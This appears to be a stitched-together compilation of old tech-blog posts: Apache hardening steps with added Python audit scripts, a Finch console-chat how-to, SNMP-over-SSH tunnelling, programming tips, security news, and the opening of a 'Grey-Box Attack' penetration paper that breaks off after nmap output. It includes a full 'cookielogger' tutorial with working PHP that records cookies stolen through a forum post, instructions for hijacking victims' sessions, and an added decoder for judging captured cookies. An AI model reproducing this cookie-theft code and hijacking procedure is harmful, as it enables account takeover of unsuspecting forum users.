    The container tags are reconstructed here for the document root of this install. The “-” before any option disables that option.
    FollowSymLinks allows a user to navigate outside the doc tree, and Indexes will reveal the contents of any directory in your doc tree.
    Includes allows .shtml pages, which use server-side includes (potentially allowing command execution on the host). If you really need SSI, use IncludesNoExec instead.
    AllowOverride None will prevent developers from overriding these settings with .htaccess files elsewhere in the doc tree.

AddIcon (remove)
IndexOptions (remove)
AddDescription (remove)
ReadmeName (remove)
HeaderName (remove)
IndexIgnore (remove)
    Remove all references to these directives, since we disabled the fancy indexing module.

Alias /manual (remove)
    Don’t provide any accessible reference to the Apache manual; it gives attackers too much info about your server.



You should familiarize yourself with the following parameters. Unless you are running a high-volume web site, you can safely leave the settings at their default values. If you are running a high-volume web site, you’ll want to adjust these directives upward to better withstand denial-of-service attacks.



* StartServers

* MinSpareServers

* MaxSpareServers

* Timeout

* Keepalive

* MaxKeepAliveRequests

* KeepAliveTimeout

* MaxClients

* MaxRequestsPerChild
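The checklist above is easy to get subtly wrong by hand (a leftover Listen, an Options line that still enables Indexes). The following linter is an added example, not part of the original guide: it reads the directives of an httpd.conf and reports which of the section 6.1 settings are missing or wrong. The two configuration fragments embedded in it are constructed for the example, and the function names are mine; only top-level "Directive value" lines are parsed (container tags are skipped), which is enough for this checklist.

```python
"""Lint an httpd.conf against the hardening settings listed above.

Added example (not part of the original guide). WEAK_CONF and HARDENED_CONF
are constructed fragments, not real files; the function names are mine.
"""

# A constructed, deliberately weak fragment: every check below should fire.
WEAK_CONF = """
ServerSignature On
ServerTokens Full
Listen 80
User nobody
Group nobody
ServerAdmin admin@xianco.com
Options Indexes FollowSymLinks
AllowOverride All
AddIcon /icons/text.gif .txt
Alias /manual "/opt/apache2/manual"
"""

# The same fragment with the settings the table asks for.
HARDENED_CONF = """
ServerSignature Off
ServerTokens Prod
User webserv
Group webserv
ServerAdmin webmaster@xianco.com
Options -FollowSymLinks -Includes -Indexes -MultiViews
AllowOverride None
"""

DANGEROUS_OPTIONS = ("FollowSymLinks", "Includes", "Indexes")
FANCY_INDEX_DIRECTIVES = ("AddIcon", "IndexOptions", "AddDescription",
                          "ReadmeName", "HeaderName", "IndexIgnore")


def parse_directives(conf_text):
    """[(name, value)] for every directive line; comments and tags skipped."""
    directives = []
    for line in conf_text.splitlines():
        line = line.strip()
        if not line or line[0] in "#<":
            continue
        name, _, value = line.partition(" ")
        directives.append((name, value.strip()))
    return directives


def lint_httpd_conf(conf_text):
    """Return a list of findings; an empty list means every check passed."""
    values = {}
    for name, value in parse_directives(conf_text):
        values.setdefault(name, []).append(value)
    findings = []

    def expect(name, wanted):
        if name not in values:
            findings.append(f"{name} not set (want {wanted})")
        for got in values.get(name, []):
            if got.lower() != wanted.lower():
                findings.append(f"{name} {got} (want {wanted})")

    expect("ServerSignature", "Off")          # no version on error pages
    expect("ServerTokens", "Prod")            # no version in the Server: header
    expect("AllowOverride", "None")           # no .htaccess overrides
    for got in values.get("Listen", []):      # Listen belongs in ssl.conf only
        findings.append(f"Listen {got} present; keep Listen only in ssl.conf")
    for name in ("User", "Group"):            # children must be unprivileged
        if name not in values:
            findings.append(f"{name} not set; use the account created in step 2")
        elif any(v.lower() == "root" for v in values[name]):
            findings.append(f"{name} root; use an unprivileged account")
    for opts in values.get("Options", []):    # the risky options must be disabled
        for token in opts.split():
            if token.startswith("-"):
                continue
            bare = token.lstrip("+")
            if bare == "All":
                findings.append("Options All; replace with explicit -FollowSymLinks -Includes -Indexes")
            elif bare in DANGEROUS_OPTIONS:
                findings.append(f"Options enables {bare}; disable it with -{bare}")
    for name in FANCY_INDEX_DIRECTIVES:       # fancy indexing module is not built
        if name in values:
            findings.append(f"{name} present; remove it, mod_autoindex is disabled")
    for got in values.get("Alias", []):       # never publish the manual
        if got.startswith("/manual"):
            findings.append(f"Alias {got} exposes the Apache manual")
    return findings


if __name__ == "__main__":
    for finding in lint_httpd_conf(WEAK_CONF):
        print("FAIL:", finding)
    print("hardened fragment findings:", lint_httpd_conf(HARDENED_CONF))
```

Run it against your real file with lint_httpd_conf(open("/opt/apache2/conf/httpd.conf").read()); it cannot judge ServerAdmin or the ErrorDocument pages, which need a human eye.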


6.2 Configure ssl.conf



Set the following in your ssl.conf file. You can also download an example ssl.conf with these settings here.


Directive and setting

Description/rationale

SSLCertificateChainFile /opt/apache2/conf/ssl.crt/ca.crt


(Find this line and uncomment it.) This points to the Certificate Authority chain file for your chained certificate, which must be present in ssl.crt. While you are in this file, check that SSLCertificateFile points at ssl.crt/server.crt and SSLCertificateKeyFile at ssl.key/server.key, the files copied in step 5.2.


6.3 Remove default Apache files



It’s important to remove default files such as sample .html files and CGI scripts (yes, even the Apache manual). This both obscures which server you’re running and removes known default content that targeted attacks against your web server probe for. You’ll probably want to build a simple index.html page to place in the htdocs directory, just so you know the web server is working when you start it.



~> sudo rm -fr /opt/apache2/htdocs/*

~> sudo rm -fr /opt/apache2/cgi-bin/*

~> sudo rm -fr /opt/apache2/icons



To test that your web server is running, you can now place this file in your htdocs directory – it’s just a simple index.html file. Make sure you set the permissions to world-readable.


6.4 Set directory and file permissions for the server



To protect the files on your server, lock down the ownership and modes of the top-level Apache directories themselves, so that the unprivileged child processes and ordinary users get exactly the access they need and no more.



* bin is where the executable portion of the Apache web server is. It should be readable/executable only by members of the webadmin group, but writable only by root, so use mode 750 (770 would let the group replace the binaries).



~> sudo chown -R root:webadmin /opt/apache2/bin

~> sudo chmod -R 750 /opt/apache2/bin



* conf is where your web server configuration files are and needs to be readable/writable only by the webadmin group. The private key under conf/ssl.key is the exception: it should be readable by root only (mode 600), as noted in step 5.2.



~> sudo chown -R root:webadmin /opt/apache2/conf

~> sudo chmod -R 770 /opt/apache2/conf



* logs is where your access and error logs will go. It should be readable only by the webadmin group, so use mode 750 rather than 755 (755 would make the logs world-readable). The webserv children do not need access: Apache opens the log files as root at startup and the children inherit the open descriptors.



~> sudo chown -R root:webadmin /opt/apache2/logs

~> sudo chmod -R 750 /opt/apache2/logs



* htdocs is where your HTML files are and needs to be world readable, but writable only by root (you should copy content in from a staging server). Mode 755 gives exactly that; 775 would leave the tree group-writable.



~> sudo chown -R root /opt/apache2/htdocs

~> sudo chmod -R 755 /opt/apache2/htdocs



* cgi-bin is where your executable scripts are and needs to be world readable/executable, but writable only by root (you should copy content in from a staging server). Again, mode 755 rather than 775, so that no group can drop a script into the directory.



~> sudo chown -R root /opt/apache2/cgi-bin

~> sudo chmod -R 755 /opt/apache2/cgi-bin
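Modes drift after the first install (a developer copies a file in as group-writable, a restore resets ownership), so the policy above is worth re-checking. The script below is an added example, not part of the original guide: POLICY encodes the intent of section 6.4 (owner, group and the loosest acceptable mode of each top-level directory), check_entry() is the pure rule applied to one path, and audit_tree() walks a real /opt/apache2 install and reports every deviation, including an SSL private key under conf/ssl.key that anyone but root can read. The paths and account names are the guide’s; the function names and the policy table are mine, and it assumes a Unix host (it uses pwd and grp).

```python
"""Audit the ownership and modes that section 6.4 prescribes.

Added example (not part of the original guide). POLICY is my encoding of the
guide's text; the directory paths and account names are the guide's own.
"""
import grp
import os
import pwd
import stat

# directory -> (owner, group or None for "don't care", maximum mode)
POLICY = {
    "/opt/apache2/bin":     ("root", "webadmin", 0o750),
    "/opt/apache2/conf":    ("root", "webadmin", 0o770),
    "/opt/apache2/logs":    ("root", "webadmin", 0o750),
    "/opt/apache2/htdocs":  ("root", None,       0o755),
    "/opt/apache2/cgi-bin": ("root", None,       0o755),
}
PRIVATE_KEY_DIR = "/opt/apache2/conf/ssl.key/"


def check_entry(path, owner, group, mode):
    """Findings for one path, given its owner and group names and its
    permission bits (mode & 0o777). Paths outside POLICY yield nothing."""
    for root_dir, (want_owner, want_group, max_mode) in POLICY.items():
        if path == root_dir or path.startswith(root_dir + "/"):
            break
    else:
        return []
    findings = []
    if owner != want_owner:
        findings.append(f"{path}: owner {owner}, want {want_owner}")
    if want_group is not None and group != want_group:
        findings.append(f"{path}: group {group}, want {want_group}")
    extra = mode & ~max_mode & 0o777          # bits the policy does not allow
    if extra:
        findings.append(f"{path}: mode {mode:o} exceeds {max_mode:o} (extra bits {extra:o})")
    if path.startswith(PRIVATE_KEY_DIR) and mode & 0o077:
        findings.append(f"{path}: private key readable by group/other (mode {mode:o})")
    return findings


def _name(lookup, ident):
    try:
        return lookup(ident)
    except KeyError:                          # uid/gid with no passwd/group entry
        return str(ident)


def audit_tree():
    """Walk every directory in POLICY on the local host and collect findings."""
    findings = []
    for root_dir in POLICY:
        if not os.path.isdir(root_dir):
            findings.append(f"{root_dir}: missing")
            continue
        for dirpath, _, filenames in os.walk(root_dir):
            for p in [dirpath] + [os.path.join(dirpath, f) for f in filenames]:
                st = os.lstat(p)
                owner = _name(lambda u: pwd.getpwuid(u).pw_name, st.st_uid)
                group = _name(lambda g: grp.getgrgid(g).gr_name, st.st_gid)
                findings += check_entry(p, owner, group, stat.S_IMODE(st.st_mode))
    return findings


if __name__ == "__main__":
    for finding in audit_tree():
        print(finding)
```

Run it as root after each content push; an empty output means the tree still matches the policy.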


7. Make final configuration and start server

Lastly, we need to modify the startup configuration for Apache and restart the server.


7.1 Modify Apache startup script so that it will notify you when it’s restarted.



As a failsafe measure, you should notify your webmaster alias any time this server is restarted. That way you’ll notice a restart you didn’t make, which usually means someone changed the configuration or the binaries.



Open /opt/apache2/bin/apachectl and add something like this to the start and restart cases, so that it runs whenever the server comes up:



tail /opt/apache2/logs/error_log |

/bin/mail -s 'Apache web server has restarted' webmaster@xianco.com

Use the same alias you set in ServerAdmin, and make sure the address does not start with a “-”, or mail will parse it as an option.



7.2 Test your configuration by starting the server



sudo /opt/apache2/bin/apachectl startssl


7.3 Keep your web server patched



Check the project sites for Apache and for every module and library you built in regularly, and apply security patches promptly.



Apache web server: http://nagoya.apache.org/dist/httpd/patches/



OpenSSL: http://www.openssl.org/source



OpenLDAP: http://www.openldap.org/


8. Configure authentication against an LDAP directory.



In this final section we’ll configure the Apache httpd.conf file so that resources are authenticated against an LDAP server. This step can’t be done until you’ve installed the web server. Once you’ve got your web server installed, just add the LDAP authentication directives to any directory container in httpd.conf (or an .htaccess file, if you allowed overrides) where you want password protection with CEC credentials. Because AuthType Basic sends the password in the clear, serve such directories only over https (which the Listen setup above guarantees), and prefer an ldaps:// URL or TLS to the directory so that the bind from the web server to the LDAP server is not in the clear either. Here’s an example of protecting a directory named “Internal” (the container tags did not survive the page’s formatting and are reconstructed here; adjust the path to where “Internal” lives under htdocs):



<Directory "/opt/apache2/htdocs/Internal">

AuthName CEC

AuthType Basic

AuthLDAPURL ldap://ldap.xianco.com:389/ou=employees,ou=people,o=xianco.com?uid?sub?(objectclass=xiancoPerson)

require valid-user

</Directory>

Finch - Howto use Pidgin via Terminal Console

For those who have started falling in love with the terminal console in Ubuntu, you may love being able to do everything from it. Even though I previously said I was already bored with the terminal because I see it every day...
it is good to know that your terminal can actually do almost everything you want to do in your Linux box. I just don't like the way it looks and feels, because I love art and graphics; I like eye-catching graphics, the live cube desktop effect and so on. Anyway, I would like to share how to use your Pidgin from the terminal console.


I have a lot to say about situations where you only have your terminal console to use programs in Linux, but let's keep it short and go straight to the point. The program that enables you to use Pidgin via the terminal console is called Finch. Finch, as the manual puts it, is "A Pimpin’ Penguin console frontend to libpurple Instant Messaging client."

Run this command on your terminal to install finch in Ubuntu:
$ sudo apt-get install finch


After installation, you can now use your Pidgin from the terminal console by running this command on your terminal:
$ finch


Since you want to use the terminal, you should already be aware that you can't use your mouse (too bad for mousey... LOL). So you have to be ready with keyboard shortcuts to use this application. Here is a quick list of useful keyboard shortcuts to use within Finch (taken from 'man finch'):

Finch: GNT Shortcut

Shortcut Description
Alt + a Bring up a list of available actions. You can use this list to access the accounts window, plugins window, preference window etc.
Alt + n Go to the next window.
Alt + p Go to the previous window.
Alt + w Show the list of windows. You can select and jump to any window from the list.
Alt + c Close the current window.
Alt + q Quit.
Alt + m Start moving a window. Press the cursor keys to move the window. When you are done, press Enter or Escape.
Alt + r Start resizing a window. Press the cursor keys to resize the window. When you are done, press Enter or Escape.
Alt + d Dump the contents of the screen in HTML format in a file named "dump.html" in working directory.
Alt + . Move the position of the current window in the window list one place to the right.
Alt + , Move the position of the current window in the window list one place to the left.
Alt + l Refresh the windows. This is useful after resizing the terminal window.
Alt + 1 2 ... 0 Jump to the 1st, 2nd ... 10th window.
Ctrl + o Bring up the menu (if there is one) for a window. Note that currently only the buddylist has a menu.
Alt + / Show a list of available key-bindings for the current widget in focus.
Alt + > Switch to the next workspace
Alt + < Switch to the previous workspace
Alt + t Tag (or untag) the current window
Alt + T Attach all the tagged windows to the current workspace
Alt + s Show the workspace list
F9 Create a new workspace and switch to it



You may now grab your terminal, try and feel it for yourself. For more information, you may simply call "man finch" and read them. That's all for now mate, Enjoy Ubuntu!!


reference: http://coderstalk.blogspot.com/2008/09/finch-howto-use-pidgin-via-terminal.html

SNMP over SSH

Many monitoring products, such as EM7 and Nagios, need an SNMP agent running on the servers they monitor. Administrators and security admins never want SNMP reachable on their production servers, because SNMPv1/v2c runs over UDP with nothing but a plaintext community string for authentication. Here is a workaround: we carry the SNMP traffic through an SSH (encrypted, authenticated) channel, so the agent on the monitored server only has to listen on localhost.


We will be using few terms here:



1. Producer: the server you want to monitor, running net-snmp

2. Proxy: a machine reachable both from the monitoring server (MS) and from the producer. The proxy sits on the local network of the MS.


3. MS: the monitoring server


Prerequisites:


socat should be installed on

Scenario:

I want to monitor my personal system from the MS. I have set up a firewall on my system in which only port 22 is open, so you cannot reach the SNMP agent on it directly. So I set up one proxy machine, ABC, which is accessible from the MS and which can also reach my machine.

Proxy Machine: ABC 10.0.0.1


On the proxy machine, open the SSH tunnel to the producer (the producer’s address is elided in the original). The forward maps port 6004 on the proxy’s loopback to port 6004 on the producer’s loopback:

ssh -f -N root@ -L 6004:localhost:6004


Start the TCP-to-UDP socat on the producer. Bind it to loopback, so that port 6004 is reachable only through the tunnel and not from the network:

socat -d -d -d -lffoo.log TCP4-LISTEN:6004,bind=127.0.0.1,fork UDP4:localhost:161


Start the UDP-to-TCP socat on the proxy:

socat -d -d -d -lffoo.log UDP4-LISTEN:161,fork TCP:localhost:6004


Start the producer’s socat before the proxy’s, since the proxy side only connects through the tunnel when a datagram arrives. If you can, use a dedicated key-only SSH account for the tunnel instead of root; the forward only needs to reach localhost:6004 on the producer.


Test by running snmpwalk on the proxy machine (the community string is the one configured on the producer’s agent):

snmpwalk -v1 -c public localhost
Now point the monitoring server at port 161 of the proxy machine to read the producer’s SNMP data and start monitoring it. Note that the leg from the MS to the proxy is still plain SNMP, so keep the proxy on the MS’s local network and firewall UDP 161 on the proxy so that only the MS can reach it.


reference:linuxforums

How to become a better programmer

Join an online programming community

There are a lot of online programming communities that you can join that will help you improve your programming ability. These communities have the latest programming news, articles and howtos, and forums. Keeping up with the news will help you stay with the times. Reading the articles and howtos will improve your programming skill. The forums are always a great way to not only get help but to help other people and learn things you didn't know in the process.
Work on an open source project

It is a good idea to work on an open source project because you will get to be part of the development of a real program. You are not only learning while you are doing your own coding but you are learning from the code of the other programmers.
Do personal projects

If you would rather work on a project by yourself then that is also a great way to learn. You need to make sure that you try something that is very different to what you have programmed before to get the most benefit. The best thing about working on personal projects is that you are free to use the latest technologies and learn all about them.
Read programming books

The Internet has so much information about programming that it seems as if books are now useless, but that is definitely not true. Books go into things in a lot more detail, and the more detail you learn about something the better you will be at it. You can also carry a book around with you, which you can't always do with a computer.
Program in another language or field

It is nice to have a good knowledge of one programming language but the popularity of programming languages seems to change so quickly. You need to be prepared for new programming languages otherwise you might not be able to program very much in the future. Other programming languages will also make you look at the way that you program in languages you already know in a different way. If you have mostly only made accounting programs then it means that you will have a hard time programming other types of software. You need to learn about how programs are made in different industry fields so that you get new ideas and learn new ways to program.
Learn about non-programming things

The interesting thing about programming is that you get the chance to learn about all the different industries that are not related to IT. The downside of this is that you have to learn about a new industry every time you work on a new program. If you think ahead and learn about all the different industries then you will prepare yourself for when you have to program for another industry. Learning about things that are not related to programming can also give you new ideas on how to solve programming problems.
Refresh your knowledge

When you haven't worked with a programming language or technology for a while then you forget a lot about it. You need to hold on to your previous knowledge by practicing things that you have learnt in the past.

How To Make A Cookielogger And Hack Any Account

Cookies hold the session token that identifies a logged-in browser to a site. If you get hold of the victim’s cookies you can take over whatever session the victim is logged into, and the original post claims this works against Google, Yahoo, Orkut, Facebook, Flickr, etc. In practice it only works for sites whose session cookie is readable by script (no HttpOnly flag) and not tied to anything else about the client.

What is a CookieLogger?

A cookie logger is a script that receives cookies stolen from the victim’s browser and appends them to a log file, from which you can read them later.

Today I am going to show How to make your own Cookie Logger…Hope you will enjoy Reading it …

Step 1: Save the notepad file from the link below and Rename it as Fun.gif:

Download it here.

Step 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php:

<?php
// Cookie logger as posted, repaired so that it runs: the opening PHP tag was
// missing and the typographic quotes have been replaced with ASCII quotes.
$filename = "logfile.txt";
if (isset($_GET["cookie"]))
{
    // Append the stolen cookie string to the log file.
    if (!$handle = fopen($filename, 'a'))
    {
        echo "Temporary Server Error,Sorry for the inconvenience.";
        exit;
    }
    else
    {
        if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE)
        {
            echo "Temporary Server Error,Sorry for the inconvenience.";
            exit;
        }
    }
    // Always show the same bland error so the victim sees nothing suspicious.
    echo "Temporary Server Error,Sorry for the inconvenience.";
    fclose($handle);
    exit;
}
echo "Temporary Server Error,Sorry for the inconvenience.";
exit;
?>


Step 3: Create a new Notepad File and Save it as logfile.txt

Step 4: Upload this file to your server

cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif

If you don’t have any Website then you can use the following Website to get a Free Website which has php support :

http://0fees.net

Step 5: Go to the victim forum and insert this code in the signature or a post :

Download it here.

Step 6: When the victim sees the post he sees the image you uploaded, but when he clicks it he gets a “Temporary Server Error” and you get his cookie in logfile.txt. (This only works if the forum renders the injected markup of step 5, i.e. it is a stored XSS, and cookies set with the HttpOnly flag cannot be read by script and will not show up.) The cookie would look as follows:

phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9


Step 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.

Step 8: Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information.

Note: make sure that between steps 6 and 8 the victim is still online, because you are hijacking the victim’s session; if the victim clicks Logout you will be logged out too. Once you have changed the password you can log in again with the new password, and the victim will not be able to.
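Whether a captured cookie is worth anything depends on what is inside it, which the post never decodes. The script below is an added example, not code from the original post: it splits the cookie string shown in step 6, URL-decodes the phpBB2 "phpbb2mysql_data" value and unserializes it (PHP serialize() format) so you can see what was stolen and whether it carries a logged-in session. The sample cookie is the one printed in the post; the function names are mine, and the unserializer handles only the scalar and array types phpBB2 uses and assumes ASCII string lengths.

```python
"""Decode what the cookie logger above actually captured.

Added example (not part of the original post). SAMPLE_COOKIE is the cookie
string the post shows in step 6; the function names are mine.
"""
from urllib.parse import unquote

# Cookie string exactly as the post shows it in step 6.
SAMPLE_COOKIE = (
    "phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3B"
    "s%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; "
    "phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9"
)


def split_cookies(cookie_header):
    """'a=1; b=2' -> {'a': '1', 'b': '2'} (values left URL-encoded)."""
    cookies = {}
    for part in cookie_header.split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            cookies[name] = value
    return cookies


def php_unserialize(data):
    """Minimal PHP unserialize(): supports N;, i:, b:, s: and a: only."""
    value, _ = _parse(data, 0)
    return value


def _parse(s, i):
    kind = s[i]
    if kind == "N":                              # N;
        return None, i + 2
    if kind in "ib":                             # i:-1;  b:1;
        end = s.index(";", i)
        raw = s[i + 2:end]
        return (int(raw) if kind == "i" else raw == "1"), end + 1
    if kind == "s":                              # s:6:"userid";
        colon = s.index(":", i + 2)
        length = int(s[i + 2:colon])             # PHP counts bytes; ASCII assumed
        start = colon + 2                        # skip :"
        return s[start:start + length], start + length + 2   # skip ";
    if kind == "a":                              # a:2:{key;value;key;value;}
        colon = s.index(":", i + 2)
        count = int(s[i + 2:colon])
        j = colon + 2                            # skip :{
        items = {}
        for _ in range(count):
            key, j = _parse(s, j)
            val, j = _parse(s, j)
            items[key] = val
        return items, j + 1                      # skip }
    raise ValueError(f"unsupported serialized type {kind!r} at offset {i}")


def decode_phpbb_cookie(cookie_header):
    """Return sid, userid and autologinid from a phpBB2 cookie string."""
    cookies = split_cookies(cookie_header)
    data = php_unserialize(unquote(cookies.get("phpbb2mysql_data", "a:0:{}")))
    return {
        "sid": cookies.get("phpbb2mysql_sid"),
        "userid": data.get("userid"),
        "autologinid": data.get("autologinid"),
    }


def usable_for_hijack(decoded):
    """phpBB2 stores userid -1 for anonymous visitors and an empty autologinid
    when 'remember me' is off, so such a cookie carries no logged-in session to
    replay; a real hit has a session id and a positive userid."""
    userid = decoded["userid"]
    return decoded["sid"] is not None and isinstance(userid, int) and userid > 0


if __name__ == "__main__":
    decoded = decode_phpbb_cookie(SAMPLE_COOKIE)
    print(decoded, "usable:", usable_for_hijack(decoded))
```

Run on the post’s own sample, the result is userid -1 with an empty autologinid: the visitor who clicked was not logged in, so that particular capture is useless for step 7, which is a point worth checking before spending time on a cookie editor.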

Disclaimer: I don’t take Responsibility for what you do with this script, served for Educational purpose only.

I DIDN'T WRITE THIS, FOR ANYONE WHO THOUGHT I DID,
JUST CONTRIBUTING.

reference:hackforums..

Another High-profile Hack, DDOS Probe Goes Global

A high-profile hack of a Twitter employee's e-mail and Google Apps accounts tops our news this week, in part because the whole saga offers a reminder about the need for strong passwords and exercising caution about what personal information is posted at social-networking sites, especially if, say, that information gives clues to your passwords. Elsewhere in security news, or perhaps we should say just about everywhere in security news, the search spread worldwide for the source of the massive denial-of-service attacks earlier this month.

1. Hacker break-in of Twitter e-mail yields secret docs, Twitter/Google Apps hack raises questions about cloud security and Possible Twitter lawsuit would dive into murky blog waters: A hacker got into a Twitter employee's e-mail account and stole confidential documents about a month ago, raising concerns about cloud-computing security and leading to another round of warnings about the need for strong passwords and the pitfalls of posting personal information on social-networking sites, among other things. The hacker used information obtained from the administrative assistant's e-mail account to access the employee's Google Apps account. In a further twist, the hacker offered the confidential documents to some bloggers and online sites, prompting Twitter cofounder Biz Stone to threaten legal action against those who publish the information.

2. Cyberattack probe goes global: British authorities are investigating the cyberattacks earlier this month that brought down prominent Web sites in the U.S., including government sites, and in South Korea. Security researchers traced the master command-and-control server used in the denial-of-service attacks to the U.K., but the master server apparently was located in Miami.

3. Reports: Microsoft and Yahoo close to search ad deal: The story that refuses to die reared its head again this week with reports that Microsoft and Yahoo are close to a search ad deal that could happen in less than a week. If it does, we will fill you in on the details next week and then hope to never have to speak of the matter again.

4. Wall Street Beat: IT investors eye bellwether financials: Various IT bellwethers reported quarterly financials this week, with some encouraging signs that tech spending has bottomed out and will begin to climb out of the rut it has been in as the second half of the year progresses.

5. Analysts see alarming development in mobile malware: Mobile botnets are surely on the horizon, with the first worm that spread on mobile devices via spam text messages the harbinger, says one security vendor.

6. Sun shareholders give nod to Oracle deal: Sun shareholders approved the company's acquisition by Oracle, but the voting margin in favor of the deal was "surprisingly low" in the opinion of Dan Olds, an analyst with Gabriel Consulting Group.

7. China's Internet users outnumber U.S. population: China had 338 million Internet users at the end of June -- more than the U.S. population, which stands at just shy of 307 million. More people in China are using e-commerce and accessing the Web using mobile phones than previously, and overall Internet use there is the highest of any country, according to the China Internet Network Information Center.

8. Survey says most companies won't deploy Windows 7: Almost six in 10 companies have no current plans to move to Microsoft's Windows 7, which is supposed to be out in October, according to a survey published by ScriptLogic, which makes software tools for the Windows OS.

9. Spam: Still a shopper's paradise: For those of us who remain mystified about why it is that spam messages purporting to sell products keep rolling into our inboxes -- who in the world clicks on those links? -- the Messaging Anti-Abuse Working Group supplied some answers. Twelve percent of respondents to a recent survey said they bought something that way, and that apparently is a high enough percentage to make spam a lucrative venture. As Ian Paul says at the outset of his column about the survey -- "All right. Listen up people: We have a problem."

10. 10 gifts from Apollo and Apollo's 40th anniversary shows true wonder of the Internet: We end this week's Top 10 with a Network World slide show that looks at 10 technologies brought to us by NASA's Apollo 11 project that landed men on the moon 40 years ago on July 20. "And today, through the true magic of the Internet, we are able to again see, hear and experience a second-by-second re-enactment of that spectacular event and relive it right on our computer screens," Todd Weiss marvels in his PC World column.

reference:http://www.packetstormsecurity.org/,http://www.pcworld.com/businesscenter/article/168640/another_highprofile_hack_ddos_probe_goes_global.html

Portland sites hacked by Turkish hackers

A handful of Portland Web sites became the unsuspecting targets of Turkish hackers over the weekend.

The home page of the Central Northeast Neighbors was replaced by a message claiming the site had been cracked by a Turkish hacker. Five other sites were also hit.

"We're a small community non-profit so it's kind of odd he would choose us," said Sandra Lefrancois, community program director.

Todd Coward, the owner of the company that hosts and services the sites, said the hacker simply erased the homepage and replaced it with his own.

Coward keeps all the files and data on private servers. He hosts more than 30 sites but only a handful were hacked. He said there's no way of knowing who is really responsible.

"I suspect he's in Turkey, (but) I don't know where he is," Coward said. "I think these people do this just to show he can do it."

Central Northeast neighbors were left wondering why they became the victims of an online hijacking.

"People don't really understand what this is all about," Lefrancois said. "Is it dangerous? Is it hurting something? Is it ruining my computer? Even somebody just looking at the site, there's kind of an aura of fear there."

LeFrancois said she hopes the hacking doesn't keep people away from the sites.

"The thing is, they may not come back to the site," she said. "We want people to repeatedly come back."

A Google search Wednesday showed numerous sites claiming to be hacked. All sites were running as normal by Wednesday night.

reference:http://www.packetstormsecurity.org/,http://www.kxl.com/ArticlePage/itemid/18048/Portland-sites-hacked-by-Turkish-hackers/

The Art of Grey-Box Attack

|=--------------------------------------------------------------------=|
|=-----------------=[ The Art of Grey-Box Attack ]=-------------------=|
|=--------------------------=[ 4 July 2009 ]=-------------------------=|
|=----------------------=[ By CWH Underground ]=--------------------=|
|=--------------------------------------------------------------------=|


######
Info
######

Title : The Art of Grey-Box Attack
Author : ZeQ3uL (Prathan Phongthiproek)
JabAv0C (Wiswat Aswamenakul)
Team : CWH Underground [www.milw0rm.com/author/1456]
Website : cwh.citec.us / www.citec.us
Date : 2009-07-04


##########
Contents
##########

[0x00] - Introduction

[0x01] - The Art of Microsoft Windows Attack

[0x01a] - Scanning & Enumeration
[0x01b] - Gaining Access
[0x01c] - Escalating Privilege

[0x02] - The Art of Unix/Linux Attack

[0x02a] - Scanning & Enumeration
[0x02b] - Gaining Access
[0x02c] - Escalating Privilege

[0x03] - Metasploit Ninja-Autopwned

[0x03a] - Nmap+Metasploit Autopwned
[0x03b] - Nessus+Metasploit Autopwned

[0x04] - Client-Side Attack with Metasploit

[0x04a] - Metasploit Payload Generator
[0x04b] - MS-Office Macro Ownage
[0x04c] - AdobeReader PDF Ownage

[0x05] - References

[0x06] - Greetz To


#######################
[0x00] - Introduction
#######################

Hi all. In this paper we will guide you through methods of hacking into Windows and Linux systems. We also show how to use the popular hacking tools nmap and Metasploit, which are far more powerful than they used to be (as we will see ;D).

We divide the paper into seven sections, 0x00 to 0x06; only sections 0x01 to 0x04 are technical. Section 0x01 shows the steps to hack into a Windows 2000 system. Section 0x02 switches to the steps of Linux hacking. The next section, 0x03, covers automatic exploitation using Metasploit combined with nmap or Nessus. The last technical section shows examples of exploiting client software in order to get access to a system :-D


##############################################
[0x01] - The Art of Microsoft Windows Attack
##############################################

In this section we talk about attacking Windows machines on a network. We start with scanning and enumeration, then move on to gaining access to the Windows system and, finally, escalating privilege in order to control the machine completely and use it to attack other machines on the network.


++++++++++++++++++++++++++++++++++
[0x01a] - Scanning & Enumeration
++++++++++++++++++++++++++++++++++

First, start scanning with nmap (http://nmap.org), which is the best scanner in our opinion. Newer versions of nmap scan faster, map ports to service names and add a scripting feature (NSE) that is ideal for penetration testing.

In the first example we use nmap with service detection (-sV) to find the open ports, which are the channels through which we attack the system:

[Nmap Result]-----------------------------------------------------------------------------------

bt nmap-4.85BETA10 # nmap -sV 192.168.80.129

Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:03 GMT
Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap/nmap-services for security and consistency reasons.
set NMAPDIR=. to give priority to files in your local directory (may affect the other data files too).
Interesting ports on 192.168.80.129:
Not shown: 990 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS webserver 5.0
135/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp open netbios-ssn
443/tcp open https?
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
1025/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open msrpc Microsoft Windows RPC
1027/tcp open msrpc Microsoft Windows RPC
1433/tcp open ms-sql-s Microsoft SQL Server 2000 8.00.194; RTM
3372/tcp open msdtc?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=4.85BETA10%I=7%D=7/3%Time=4A4DD777%P=i686-pc-linux-gnu%r
